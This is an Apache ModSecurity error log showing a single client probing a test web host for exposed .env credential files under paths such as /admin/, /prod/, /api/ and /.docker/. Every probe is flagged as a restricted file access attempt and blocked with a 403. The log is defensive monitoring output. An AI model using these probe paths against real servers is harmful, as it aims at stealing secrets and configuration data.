[Tue Jan 21 15:15:50.026550 2025] [:error] [pid 621467] [client 193.41.206.36:42868] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "Z4-sFpI8RB7_o08OfB6JAQAAAAk"]
[Tue Jan 21 15:15:50.026960 2025] [:error] [pid 621467] [client 193.41.206.36:42868] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "Z4-sFpI8RB7_o08OfB6JAQAAAAk"]
[Tue Jan 21 15:15:50.027391 2025] [:error] [pid 621467] [client 193.41.206.36:42868] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "Z4-sFpI8RB7_o08OfB6JAQAAAAk"]
[Tue Jan 21 15:15:50.132673 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "Z4-sFnSo5nIGeA4GeT4biAAAAAc"]
[Tue Jan 21 15:15:50.132969 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "Z4-sFnSo5nIGeA4GeT4biAAAAAc"]
[Tue Jan 21 15:15:50.133255 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "Z4-sFnSo5nIGeA4GeT4biAAAAAc"]
[Tue Jan 21 15:15:52.739341 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "Z4-sGHSo5nIGeA4GeT4biQAAAAc"]
[Tue Jan 21 15:15:52.739802 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "Z4-sGHSo5nIGeA4GeT4biQAAAAc"]
[Tue Jan 21 15:15:52.740359 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "Z4-sGHSo5nIGeA4GeT4biQAAAAc"]
[Tue Jan 21 15:15:52.776287 2025] [:error] [pid 621467] [client 193.41.206.36:42868] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "Z4-sGJI8RB7_o08OfB6JAgAAAAk"]
[Tue Jan 21 15:15:52.776650 2025] [:error] [pid 621467] [client 193.41.206.36:42868] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "Z4-sGJI8RB7_o08OfB6JAgAAAAk"]
[Tue Jan 21 15:15:52.777154 2025] [:error] [pid 621467] [client 193.41.206.36:42868] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "Z4-sGJI8RB7_o08OfB6JAgAAAAk"]
[Tue Jan 21 15:15:55.407282 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "Z4-sG3So5nIGeA4GeT4bigAAAAc"]
[Tue Jan 21 15:15:55.407695 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "Z4-sG3So5nIGeA4GeT4bigAAAAc"]
[Tue Jan 21 15:15:55.408175 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "Z4-sG3So5nIGeA4GeT4bigAAAAc"]
[Tue Jan 21 15:15:57.987157 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z4-sHXSo5nIGeA4GeT4biwAAAAc"]
[Tue Jan 21 15:15:57.987557 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z4-sHXSo5nIGeA4GeT4biwAAAAc"]
[Tue Jan 21 15:15:57.988060 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z4-sHXSo5nIGeA4GeT4biwAAAAc"]
[Tue Jan 21 15:16:00.709986 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "Z4-sIHSo5nIGeA4GeT4bjAAAAAc"]
[Tue Jan 21 15:16:00.710471 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "Z4-sIHSo5nIGeA4GeT4bjAAAAAc"]
[Tue Jan 21 15:16:00.710970 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "Z4-sIHSo5nIGeA4GeT4bjAAAAAc"]
[Tue Jan 21 15:16:03.342029 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4-sI3So5nIGeA4GeT4bjQAAAAc"]
[Tue Jan 21 15:16:03.342619 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4-sI3So5nIGeA4GeT4bjQAAAAc"]
[Tue Jan 21 15:16:03.343106 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4-sI3So5nIGeA4GeT4bjQAAAAc"]
[Tue Jan 21 15:16:05.949309 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "Z4-sJXSo5nIGeA4GeT4bjgAAAAc"]
[Tue Jan 21 15:16:05.949825 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "Z4-sJXSo5nIGeA4GeT4bjgAAAAc"]
[Tue Jan 21 15:16:05.950388 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "Z4-sJXSo5nIGeA4GeT4bjgAAAAc"]
[Tue Jan 21 15:16:06.444384 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z4-sJnWu2t9ReOwcqmDbJgAAAAs"]
[Tue Jan 21 15:16:06.444846 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z4-sJnWu2t9ReOwcqmDbJgAAAAs"]
[Tue Jan 21 15:16:06.445273 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z4-sJnWu2t9ReOwcqmDbJgAAAAs"]
[Tue Jan 21 15:16:08.552225 2025] [authz_core:error] [pid 610121] [client 193.41.206.36:42872] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Tue Jan 21 15:16:09.212325 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "Z4-sKXWu2t9ReOwcqmDbJwAAAAs"]
[Tue Jan 21 15:16:09.212641 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "Z4-sKXWu2t9ReOwcqmDbJwAAAAs"]
[Tue Jan 21 15:16:09.212909 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "Z4-sKXWu2t9ReOwcqmDbJwAAAAs"]
[Tue Jan 21 15:16:11.266159 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z4-sK3So5nIGeA4GeT4bkAAAAAc"]
[Tue Jan 21 15:16:11.266644 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z4-sK3So5nIGeA4GeT4bkAAAAAc"]
[Tue Jan 21 15:16:11.267138 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z4-sK3So5nIGeA4GeT4bkAAAAAc"]
[Tue Jan 21 15:16:11.843245 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4-sK3Wu2t9ReOwcqmDbKAAAAAs"]
[Tue Jan 21 15:16:11.843892 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4-sK3Wu2t9ReOwcqmDbKAAAAAs"]
[Tue Jan 21 15:16:11.844528 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4-sK3Wu2t9ReOwcqmDbKAAAAAs"]
